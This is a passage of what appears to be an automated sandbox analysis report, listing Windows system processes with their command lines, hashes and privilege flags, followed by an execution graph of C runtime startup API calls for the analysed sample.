                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:05:14:40
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                    Imagebase:0x7ff6d0590000
                                                                                                                                    File size:163336 bytes
                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:05:14:40
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:05:14:41
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:05:14:49
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:05:14:49
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:05:15:28
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:05:15:41
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                    Imagebase:0x7ff678970000
                                                                                                                                    File size:455656 bytes
                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:05:15:42
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff647620000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:05:15:49
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:05:16:05
                                                                                                                                    Start date:14/05/2022
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                                                                                                      Signature Coverage:16.1%
                                                                                                                                      Total number of Nodes:685
                                                                                                                                      Total number of Limit Nodes:6
                                                                                                                                      execution_graph 9669 7fffe2312290 9672 7fffe23122b6 9669->9672 9670 7fffe23122be 9671 7fffe23122f3 9671->9670 9723 7fffe22d1230 9671->9723 9672->9670 9672->9671 9681 7fffe2312154 9672->9681 9676 7fffe2312154 126 API calls 9676->9670 9677 7fffe22d1230 8 API calls 9678 7fffe2312328 9677->9678 9679 7fffe2312154 126 API calls 9678->9679 9680 7fffe2312335 9679->9680 9680->9670 9680->9676 9682 7fffe23121e1 9681->9682 9683 7fffe2312162 9681->9683 9685 7fffe231221e 9682->9685 9692 7fffe23121e5 9682->9692 9728 7fffe2314110 HeapCreate 9683->9728 9686 7fffe2312279 9685->9686 9687 7fffe2312223 9685->9687 9689 7fffe231216d 9686->9689 9848 7fffe2312f50 9686->9848 9821 7fffe2313108 9687->9821 9689->9671 9692->9689 9695 7fffe2313a48 46 API calls 9692->9695 9694 7fffe2312179 _RTC_Initialize 9698 7fffe231217d 9694->9698 9703 7fffe2312189 GetCommandLineA 9694->9703 9696 7fffe2312212 9695->9696 9699 7fffe2312c94 48 API calls 9696->9699 9826 7fffe231415c HeapDestroy 9698->9826 9702 7fffe2312217 9699->9702 9700 7fffe2312243 FlsSetValue 9704 7fffe231226f 9700->9704 9705 7fffe2312259 9700->9705 9832 7fffe231415c HeapDestroy 9702->9832 9747 7fffe2313eec 9703->9747 9842 7fffe2313024 9704->9842 9833 7fffe2312cbc 9705->9833 9714 7fffe23121ab 9785 7fffe2312c94 9714->9785 9717 7fffe23121b7 9718 7fffe23121cb 9717->9718 9800 7fffe2313aec 9717->9800 9718->9689 9827 7fffe2313a48 9718->9827 9724 7fffe22d1249 wcsftime 9723->9724 9725 7fffe22d1276 9724->9725 9726 7fffe23120e0 __initmbctable 8 API calls 9725->9726 9727 7fffe231203e 9726->9727 9727->9677 9727->9680 9729 7fffe2314134 HeapSetInformation 9728->9729 9730 7fffe2312169 9728->9730 9729->9730 9730->9689 9731 7fffe2312fa0 9730->9731 9854 7fffe23136f0 9731->9854 9733 7fffe2312fab 9859 7fffe2316970 9733->9859 9736 7fffe2313014 9739 7fffe2312c94 48 API calls 9736->9739 9737 7fffe2312fb4 FlsAlloc 9737->9736 9738 7fffe2312fcc 9737->9738 9740 7fffe2313108 __wtomb_environ 45 API calls 9738->9740 9741 7fffe2313019 9739->9741 9742 7fffe2312fdb 9740->9742 9741->9694 9742->9736 9743 7fffe2312fe3 FlsSetValue 9742->9743 9743->9736 9744 7fffe2312ff6 9743->9744 9745 7fffe2312cbc __doserrno 45 API calls 9744->9745 9746 7fffe2313000 GetCurrentThreadId 9745->9746 9746->9741 9748 7fffe2313f1b GetEnvironmentStringsW 9747->9748 9749 7fffe2313f4d 9747->9749 9750 7fffe2313f35 GetLastError 9748->9750 9751 7fffe2313f29 9748->9751 9749->9751 9752 7fffe2314010 9749->9752 9750->9749 9754 7fffe2313f70 WideCharToMultiByte 9751->9754 9755 7fffe2313f5b GetEnvironmentStringsW 9751->9755 9753 7fffe231401d GetEnvironmentStrings 9752->9753 9757 7fffe231219b 9752->9757 9753->9757 9758 7fffe231402f 9753->9758 9759 7fffe2313fff 9754->9759 9760 7fffe2313fbe 9754->9760 9755->9754 9755->9757 9772 7fffe2313758 GetStartupInfoA 9757->9772 9761 7fffe231309c __setargv 45 API calls 9758->9761 9763 7fffe2314002 FreeEnvironmentStringsW 9759->9763 9866 7fffe231309c 9760->9866 9764 7fffe2314053 9761->9764 9763->9757 9766 7fffe2314069 __initmbctable 9764->9766 9767 7fffe231405b FreeEnvironmentStringsA 9764->9767 9770 7fffe2314077 FreeEnvironmentStringsA 9766->9770 9767->9757 9768 7fffe2313fce WideCharToMultiByte 9768->9763 9769 7fffe2313ff7 9768->9769 9771 7fffe2313024 free 45 API calls 9769->9771 9770->9757 9771->9759 9773 7fffe2313108 __wtomb_environ 45 API calls 9772->9773 9783 7fffe2313795 9773->9783 9774 7fffe23121a7 9774->9714 9793 7fffe2313df4 9774->9793 9775 7fffe2313981 GetStdHandle 9779 7fffe231395b 9775->9779 9776 7fffe23139b0 GetFileType 9776->9779 9777 7fffe2313108 __wtomb_environ 45 API calls 9777->9783 9778 7fffe2313a10 SetHandleCount 9778->9774 9779->9774 9779->9775 9779->9776 9779->9778 9782 7fffe2317ee4 _lock InitializeCriticalSectionAndSpinCount 9779->9782 9780 7fffe23138c4 9780->9774 9780->9779 9781 7fffe23138f7 GetFileType 9780->9781 9784 7fffe2317ee4 _lock InitializeCriticalSectionAndSpinCount 9780->9784 9781->9780 9782->9779 9783->9774 9783->9777 9783->9779 9783->9780 9784->9780 9786 7fffe2312ca3 FlsFree 9785->9786 9787 7fffe2312cb0 9785->9787 9786->9787 9788 7fffe2316a2f DeleteCriticalSection 9787->9788 9789 7fffe2316a4d 9787->9789 9790 7fffe2313024 free 45 API calls 9788->9790 9791 7fffe2316a5b DeleteCriticalSection 9789->9791 9792 7fffe2316a6a 9789->9792 9790->9787 9791->9789 9792->9698 9794 7fffe2313e11 GetModuleFileNameA 9793->9794 9795 7fffe2313e0c 9793->9795 9797 7fffe2313e43 __setargv 9794->9797 10012 7fffe2314ecc 9795->10012 9798 7fffe231309c __setargv 45 API calls 9797->9798 9799 7fffe2313e97 __setargv 9797->9799 9798->9799 9799->9717 9801 7fffe2313b09 9800->9801 9803 7fffe2313b0e __wtomb_environ 9800->9803 9802 7fffe2314ecc __initmbctable 83 API calls 9801->9802 9802->9803 9804 7fffe2313108 __wtomb_environ 45 API calls 9803->9804 9807 7fffe23121c0 9803->9807 9809 7fffe2313b4d __wtomb_environ 9804->9809 9805 7fffe2313bc6 9806 7fffe2313024 free 45 API calls 9805->9806 9806->9807 9807->9718 9815 7fffe231347c 9807->9815 9808 7fffe2313108 __wtomb_environ 45 API calls 9808->9809 9809->9805 9809->9807 9809->9808 9810 7fffe2313c02 9809->9810 9811 7fffe2317fbc __wtomb_environ 45 API calls 9809->9811 9813 7fffe2313ba2 9809->9813 9812 7fffe2313024 free 45 API calls 9810->9812 9811->9809 9812->9807 9814 7fffe2316550 __wtomb_environ 6 API calls 9813->9814 9814->9809 9817 7fffe2313492 _cinit 9815->9817 10416 7fffe23173f4 9817->10416 9818 7fffe23134af _initterm_e 9820 7fffe23134d2 _cinit 9818->9820 10419 7fffe23173dc 9818->10419 9820->9718 9822 7fffe231312d 9821->9822 9824 7fffe2312237 9822->9824 9825 7fffe231314b Sleep 9822->9825 10436 7fffe2316cec 9822->10436 9824->9689 9824->9700 9825->9822 9825->9824 9826->9689 9828 7fffe2313a59 9827->9828 9829 7fffe2313aa8 9828->9829 9830 7fffe2313024 free 45 API calls 9828->9830 9831 7fffe2313a70 DeleteCriticalSection 9828->9831 9829->9714 9830->9828 9831->9828 9832->9689 9834 7fffe2316ba0 _lock 45 API calls 9833->9834 9835 7fffe2312d11 9834->9835 10445 7fffe2316a80 LeaveCriticalSection 9835->10445 9843 7fffe2313029 HeapFree 9842->9843 9845 7fffe2313059 realloc 9842->9845 9844 7fffe2313044 9843->9844 9843->9845 9846 7fffe23167e0 _errno 43 API calls 9844->9846 9845->9689 9847 7fffe2313049 GetLastError 9846->9847 9847->9845 9849 7fffe2312f64 9848->9849 9850 7fffe2312f88 9848->9850 9851 7fffe2312f78 FlsSetValue 9849->9851 9852 7fffe2312f69 FlsGetValue 9849->9852 9850->9689 10446 7fffe2312e18 9851->10446 9852->9851 9863 7fffe2312c5c EncodePointer 9854->9863 9856 7fffe23136fb _initp_misc_winsig 9857 7fffe231755c EncodePointer 9856->9857 9858 7fffe231373e EncodePointer 9857->9858 9858->9733 9860 7fffe2316993 9859->9860 9862 7fffe2312fb0 9860->9862 9864 7fffe2317ee4 InitializeCriticalSectionAndSpinCount 9860->9864 9862->9736 9862->9737 9865 7fffe2317f11 9864->9865 9865->9860 9867 7fffe23130b8 9866->9867 9869 7fffe23130f0 9867->9869 9870 7fffe23130d0 Sleep 9867->9870 9871 7fffe2316c34 9867->9871 9869->9759 9869->9768 9870->9867 9870->9869 9872 7fffe2316cc8 realloc 9871->9872 9883 7fffe2316c4c realloc 9871->9883 9875 7fffe23167e0 _errno 44 API calls 9872->9875 9873 7fffe2316c84 RtlAllocateHeap 9877 7fffe2316cbd 9873->9877 9873->9883 9874 7fffe2316c64 9874->9873 9885 7fffe2317160 9874->9885 9894 7fffe2316f0c 9874->9894 9927 7fffe231334c 9874->9927 9875->9877 9877->9867 9878 7fffe2316cad 9930 7fffe23167e0 9878->9930 9881 7fffe2316cb2 9884 7fffe23167e0 _errno 44 API calls 9881->9884 9883->9873 9883->9874 9883->9878 9883->9881 9884->9877 9933 7fffe231d2ac 9885->9933 9888 7fffe231717d 9890 7fffe2316f0c _FF_MSGBANNER 45 API calls 9888->9890 9892 7fffe231719e 9888->9892 9889 7fffe231d2ac _FF_MSGBANNER 45 API calls 9889->9888 9891 7fffe2317194 9890->9891 9893 7fffe2316f0c _FF_MSGBANNER 45 API calls 9891->9893 9892->9874 9893->9892 9895 7fffe2316f2f 9894->9895 9896 7fffe23170d4 9895->9896 9897 7fffe231d2ac _FF_MSGBANNER 42 API calls 9895->9897 9896->9874 9898 7fffe2316f51 9897->9898 9899 7fffe23170d6 GetStdHandle 9898->9899 9900 7fffe231d2ac _FF_MSGBANNER 42 API calls 9898->9900 9899->9896 9901 7fffe23170e9 __wtomb_environ 9899->9901 9902 7fffe2316f64 9900->9902 9901->9896 9904 7fffe23170ff WriteFile 9901->9904 9902->9899 9903 7fffe2316f75 9902->9903 9903->9896 9952 7fffe2317fbc 9903->9952 9904->9896 9907 7fffe2316fb9 GetModuleFileNameA 9909 7fffe2316fd9 9907->9909 9912 7fffe231700a __wtomb_environ 9907->9912 9908 7fffe2316550 __wtomb_environ 6 API calls 9908->9907 9910 7fffe2317fbc __wtomb_environ 42 API calls 9909->9910 9911 7fffe2316ff1 9910->9911 9911->9912 9915 7fffe2316550 __wtomb_environ 6 API calls 9911->9915 9913 7fffe2317065 9912->9913 9961 7fffe231bf14 9912->9961 9970 7fffe231bdf4 9913->9970 9915->9912 9918 7fffe2317090 9921 7fffe231bdf4 _FF_MSGBANNER 42 API calls 9918->9921 9920 7fffe2316550 __wtomb_environ 6 API calls 9920->9918 9922 7fffe23170a6 9921->9922 9923 7fffe23170bf 9922->9923 9925 7fffe2316550 __wtomb_environ 6 API calls 9922->9925 9979 7fffe231d0b8 9923->9979 9924 7fffe2316550 __wtomb_environ 6 API calls 9924->9913 9925->9923 9997 7fffe2313310 GetModuleHandleW 9927->9997 10000 7fffe2312d70 GetLastError FlsGetValue 9930->10000 9932 7fffe23167e9 9932->9881 9934 7fffe231d2b4 9933->9934 9935 7fffe231716e 9934->9935 9936 7fffe23167e0 _errno 45 API calls 9934->9936 9935->9888 9935->9889 9937 7fffe231d2d9 9936->9937 9939 7fffe23166d8 DecodePointer 9937->9939 9940 7fffe2316723 _invalid_parameter_noinfo 9939->9940 9941 7fffe2316709 9939->9941 9943 7fffe2316550 9940->9943 9941->9935 9950 7fffe23187a0 9943->9950 9945 7fffe2316570 RtlCaptureContext 9946 7fffe23165ad 9945->9946 9947 7fffe231660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9946->9947 9948 7fffe2316658 GetCurrentProcess TerminateProcess 9947->9948 9949 7fffe231664c _invalid_parameter_noinfo 9947->9949 9948->9941 9949->9948 9951 7fffe23187a9 9950->9951 9951->9945 9951->9951 9953 7fffe2317fc7 9952->9953 9955 7fffe2317fd1 9952->9955 9953->9955 9959 7fffe2317ffd 9953->9959 9954 7fffe23167e0 _errno 45 API calls 9956 7fffe2317fd9 9954->9956 9955->9954 9957 7fffe23166d8 _invalid_parameter_noinfo 7 API calls 9956->9957 9958 7fffe2316fa0 9957->9958 9958->9907 9958->9908 9959->9958 9960 7fffe23167e0 _errno 45 API calls 9959->9960 9960->9956 9965 7fffe231bf22 9961->9965 9962 7fffe231bf27 9963 7fffe231704c 9962->9963 9964 7fffe23167e0 _errno 45 API calls 9962->9964 9963->9913 9963->9924 9966 7fffe231bf51 9964->9966 9965->9962 9965->9963 9968 7fffe231bf75 9965->9968 9967 7fffe23166d8 _invalid_parameter_noinfo 7 API calls 9966->9967 9967->9963 9968->9963 9969 7fffe23167e0 _errno 45 API calls 9968->9969 9969->9966 9971 7fffe231be02 9970->9971 9975 7fffe231be0c 9970->9975 9974 7fffe231be50 9971->9974 9971->9975 9972 7fffe23167e0 _errno 45 API calls 9978 7fffe231be14 9972->9978 9973 7fffe23166d8 _invalid_parameter_noinfo 7 API calls 9976 7fffe2317077 9973->9976 9974->9976 9977 7fffe23167e0 _errno 45 API calls 9974->9977 9975->9972 9976->9918 9976->9920 9977->9978 9978->9973 9996 7fffe2312c5c EncodePointer 9979->9996 9998 7fffe231333f ExitProcess 9997->9998 9999 7fffe231332a GetProcAddress 9997->9999 9999->9998 10001 7fffe2312d96 10000->10001 10002 7fffe2312dde SetLastError 10000->10002 10003 7fffe2313108 __wtomb_environ 40 API calls 10001->10003 10002->9932 10004 7fffe2312da3 10003->10004 10004->10002 10005 7fffe2312dab FlsSetValue 10004->10005 10006 7fffe2312dc1 10005->10006 10007 7fffe2312dd7 10005->10007 10008 7fffe2312cbc __doserrno 40 API calls 10006->10008 10009 7fffe2313024 free 40 API calls 10007->10009 10010 7fffe2312dc8 GetCurrentThreadId 10008->10010 10011 7fffe2312ddc 10009->10011 10010->10002 10011->10002 10013 7fffe2314ed9 10012->10013 10014 7fffe2314ee3 10012->10014 10016 7fffe2314cd4 10013->10016 10014->9794 10040 7fffe2312df4 10016->10040 10023 7fffe2314e81 10023->10014 10024 7fffe231309c __setargv 45 API calls 10025 7fffe2314d24 __initmbctable 10024->10025 10025->10023 10063 7fffe2314a0c 10025->10063 10028 7fffe2314d5f 10033 7fffe2313024 free 45 API calls 10028->10033 10034 7fffe2314d84 10028->10034 10029 7fffe2314e83 10029->10023 10030 7fffe2314e9c 10029->10030 10031 7fffe2313024 free 45 API calls 10029->10031 10032 7fffe23167e0 _errno 45 API calls 10030->10032 10031->10030 10032->10023 10033->10034 10034->10023 10073 7fffe2316ba0 10034->10073 10041 7fffe2312d70 __doserrno 45 API calls 10040->10041 10042 7fffe2312dff 10041->10042 10043 7fffe2312e0f 10042->10043 10079 7fffe23132e0 10042->10079 10045 7fffe23148c0 10043->10045 10046 7fffe2312df4 _getptd 45 API calls 10045->10046 10047 7fffe23148cf 10046->10047 10048 7fffe23148ea 10047->10048 10049 7fffe2316ba0 _lock 45 API calls 10047->10049 10050 7fffe231496e 10048->10050 10052 7fffe23132e0 _lock 45 API calls 10048->10052 10054 7fffe23148fd 10049->10054 10056 7fffe231497c 10050->10056 10051 7fffe2314934 10084 7fffe2316a80 LeaveCriticalSection 10051->10084 10052->10050 10054->10051 10055 7fffe2313024 free 45 API calls 10054->10055 10055->10051 10085 7fffe2312534 10056->10085 10059 7fffe23149c1 10061 7fffe23149c6 GetACP 10059->10061 10062 7fffe23149ac 10059->10062 10060 7fffe231499c GetOEMCP 10060->10062 10061->10062 10062->10023 10062->10024 10064 7fffe231497c __initmbctable 47 API calls 10063->10064 10065 7fffe2314a33 10064->10065 10066 7fffe2314a3b __initmbctable 10065->10066 10067 7fffe2314a8c IsValidCodePage 10065->10067 10072 7fffe2314ab2 __initmbctable 10065->10072 10262 7fffe23120e0 10066->10262 10067->10066 10069 7fffe2314a9d GetCPInfo 10067->10069 10069->10066 10069->10072 10070 7fffe2314c6f 10070->10028 10070->10029 10252 7fffe23146dc GetCPInfo 10072->10252 10074 7fffe2316bcf EnterCriticalSection 10073->10074 10075 7fffe2316bbe 10073->10075 10390 7fffe2316ab8 10075->10390 10078 7fffe23132e0 _lock 44 API calls 10078->10074 10080 7fffe2317160 _FF_MSGBANNER 44 API calls 10079->10080 10081 7fffe23132ed 10080->10081 10082 7fffe2316f0c _FF_MSGBANNER 44 API calls 10081->10082 10083 7fffe23132f4 DecodePointer 10082->10083 10086 7fffe231254a 10085->10086 10088 7fffe23125ae 10085->10088 10087 7fffe2312df4 _getptd 45 API calls 10086->10087 10089 7fffe231254f 10087->10089 10088->10059 10088->10060 10090 7fffe2312587 10089->10090 10093 7fffe231524c 10089->10093 10090->10088 10092 7fffe23148c0 __initmbctable 45 API calls 10090->10092 10092->10088 10094 7fffe2312df4 _getptd 45 API calls 10093->10094 10095 7fffe2315257 10094->10095 10096 7fffe2315280 10095->10096 10097 7fffe2315272 10095->10097 10098 7fffe2316ba0 _lock 45 API calls 10096->10098 10100 7fffe2312df4 _getptd 45 API calls 10097->10100 10099 7fffe231528a 10098->10099 10107 7fffe23151f4 10099->10107 10102 7fffe2315277 10100->10102 10105 7fffe23152b8 10102->10105 10106 7fffe23132e0 _lock 45 API calls 10102->10106 10105->10090 10106->10105 10108 7fffe2315202 __doserrno localeconv 10107->10108 10109 7fffe231523e 10107->10109 10108->10109 10112 7fffe2314f04 10108->10112 10111 7fffe2316a80 LeaveCriticalSection 10109->10111 10113 7fffe2314f9b 10112->10113 10116 7fffe2314f22 10112->10116 10114 7fffe2314fee 10113->10114 10115 7fffe2313024 free 45 API calls 10113->10115 10131 7fffe231501b 10114->10131 10164 7fffe23198a4 10114->10164 10117 7fffe2314fbf 10115->10117 10116->10113 10119 7fffe2314f61 10116->10119 10123 7fffe2313024 free 45 API calls 10116->10123 10120 7fffe2313024 free 45 API calls 10117->10120 10121 7fffe2314f83 10119->10121 10130 7fffe2313024 free 45 API calls 10119->10130 10124 7fffe2314fd3 10120->10124 10126 7fffe2313024 free 45 API calls 10121->10126 10128 7fffe2314f55 10123->10128 10129 7fffe2313024 free 45 API calls 10124->10129 10125 7fffe2315067 10132 7fffe2314f8f 10126->10132 10127 7fffe2313024 free 45 API calls 10127->10131 10140 7fffe2319df8 10128->10140 10134 7fffe2314fe2 10129->10134 10135 7fffe2314f77 10130->10135 10131->10125 10136 7fffe2313024 45 API calls free 10131->10136 10137 7fffe2313024 free 45 API calls 10132->10137 10138 7fffe2313024 free 45 API calls 10134->10138 10156 7fffe2319b68 10135->10156 10136->10131 10137->10113 10138->10114 10141 7fffe2319e01 10140->10141 10142 7fffe2319e87 10140->10142 10143 7fffe2319e1b 10141->10143 10144 7fffe2313024 free 45 API calls 10141->10144 10142->10119 10145 7fffe2319e2d 10143->10145 10146 7fffe2313024 free 45 API calls 10143->10146 10144->10143 10147 7fffe2319e3f 10145->10147 10148 7fffe2313024 free 45 API calls 10145->10148 10146->10145 10149 7fffe2319e51 10147->10149 10150 7fffe2313024 free 45 API calls 10147->10150 10148->10147 10151 7fffe2319e63 10149->10151 10153 7fffe2313024 free 45 API calls 10149->10153 10150->10149 10152 7fffe2319e75 10151->10152 10154 7fffe2313024 free 45 API calls 10151->10154 10152->10142 10155 7fffe2313024 free 45 API calls 10152->10155 10153->10151 10154->10152 10155->10142 10157 7fffe2319baa 10156->10157 10158 7fffe2319b6d 10156->10158 10157->10121 10159 7fffe2319b86 10158->10159 10160 7fffe2313024 free 45 API calls 10158->10160 10161 7fffe2319b98 10159->10161 10162 7fffe2313024 free 45 API calls 10159->10162 10160->10159 10161->10157 10163 7fffe2313024 free 45 API calls 10161->10163 10162->10161 10163->10157 10165 7fffe23198ad 10164->10165 10251 7fffe231500f 10164->10251 10166 7fffe2313024 free 45 API calls 10165->10166 10167 7fffe23198be 10166->10167 10168 7fffe2313024 free 45 API calls 10167->10168 10169 7fffe23198c7 10168->10169 10170 7fffe2313024 free 45 API calls 10169->10170 10171 7fffe23198d0 10170->10171 10172 7fffe2313024 free 45 API calls 10171->10172 10173 7fffe23198d9 10172->10173 10174 7fffe2313024 free 45 API calls 10173->10174 10175 7fffe23198e2 10174->10175 10176 7fffe2313024 free 45 API calls 10175->10176 10177 7fffe23198eb 10176->10177 10178 7fffe2313024 free 45 API calls 10177->10178 10179 7fffe23198f3 10178->10179 10180 7fffe2313024 free 45 API calls 10179->10180 10181 7fffe23198fc 10180->10181 10182 7fffe2313024 free 45 API calls 10181->10182 10183 7fffe2319905 10182->10183 10184 7fffe2313024 free 45 API calls 10183->10184 10185 7fffe231990e 10184->10185 10186 7fffe2313024 free 45 API calls 10185->10186 10187 7fffe2319917 10186->10187 10188 7fffe2313024 free 45 API calls 10187->10188 10189 7fffe2319920 10188->10189 10190 7fffe2313024 free 45 API calls 10189->10190 10191 7fffe2319929 10190->10191 10192 7fffe2313024 free 45 API calls 10191->10192 10193 7fffe2319932 10192->10193 10194 7fffe2313024 free 45 API calls 10193->10194 10195 7fffe231993b 10194->10195 10196 7fffe2313024 free 45 API calls 10195->10196 10197 7fffe2319944 10196->10197 10198 7fffe2313024 free 45 API calls 10197->10198 10199 7fffe2319950 10198->10199 10200 7fffe2313024 free 45 API calls 10199->10200 10201 7fffe231995c 10200->10201 10202 7fffe2313024 free 45 API calls 10201->10202 10203 7fffe2319968 10202->10203 10204 7fffe2313024 free 45 API calls 10203->10204 10205 7fffe2319974 10204->10205 10206 7fffe2313024 free 45 API calls 10205->10206 10207 7fffe2319980 10206->10207 10208 7fffe2313024 free 45 API calls 10207->10208 10209 7fffe231998c 10208->10209 10210 7fffe2313024 free 45 API calls 10209->10210 10211 7fffe2319998 10210->10211 10212 7fffe2313024 free 45 API calls 10211->10212 10213 7fffe23199a4 10212->10213 10214 7fffe2313024 free 45 API calls 10213->10214 10215 7fffe23199b0 10214->10215 10216 7fffe2313024 free 45 API calls 10215->10216 10217 7fffe23199bc 10216->10217 10218 7fffe2313024 free 45 API calls 10217->10218 10219 7fffe23199c8 10218->10219 10220 7fffe2313024 free 45 API calls 10219->10220 10221 7fffe23199d4 10220->10221 10222 7fffe2313024 free 45 API calls 10221->10222 10223 7fffe23199e0 10222->10223 10224 7fffe2313024 free 45 API calls 10223->10224 10225 7fffe23199ec 10224->10225 10226 7fffe2313024 free 45 API calls 10225->10226 10227 7fffe23199f8 10226->10227 10228 7fffe2313024 free 45 API calls 10227->10228 10229 7fffe2319a04 10228->10229 10230 7fffe2313024 free 45 API calls 10229->10230 10231 7fffe2319a10 10230->10231 10232 7fffe2313024 free 45 API calls 10231->10232 10233 7fffe2319a1c 10232->10233 10234 7fffe2313024 free 45 API calls 10233->10234 10235 7fffe2319a28 10234->10235 10236 7fffe2313024 free 45 API calls 10235->10236 10237 7fffe2319a34 10236->10237 10238 7fffe2313024 free 45 API calls 10237->10238 10239 7fffe2319a40 10238->10239 10240 7fffe2313024 free 45 API calls 10239->10240 10241 7fffe2319a4c 10240->10241 10242 7fffe2313024 free 45 API calls 10241->10242 10243 7fffe2319a58 10242->10243 10244 7fffe2313024 free 45 API calls 10243->10244 10245 7fffe2319a64 10244->10245 10246 7fffe2313024 free 45 API calls 10245->10246 10247 7fffe2319a70 10246->10247 10248 7fffe2313024 free 45 API calls 10247->10248 10249 7fffe2319a7c 10248->10249 10250 7fffe2313024 free 45 API calls 10249->10250 10250->10251 10251->10127 10253 7fffe231471e __initmbctable 10252->10253 10261 7fffe231480a 10252->10261 10273 7fffe23191a0 10253->10273 10256 7fffe23120e0 __initmbctable 8 API calls 10258 7fffe23148aa 10256->10258 10258->10066 10260 7fffe2318e9c __initmbctable 78 API calls 10260->10261 10261->10256 10263 7fffe23120e9 10262->10263 10264 7fffe23120f4 10263->10264 10265 7fffe23123e8 RtlCaptureContext RtlLookupFunctionEntry 10263->10265 10264->10070 10266 7fffe231242c RtlVirtualUnwind 10265->10266 10267 7fffe231246d 10265->10267 10268 7fffe231248f IsDebuggerPresent 10266->10268 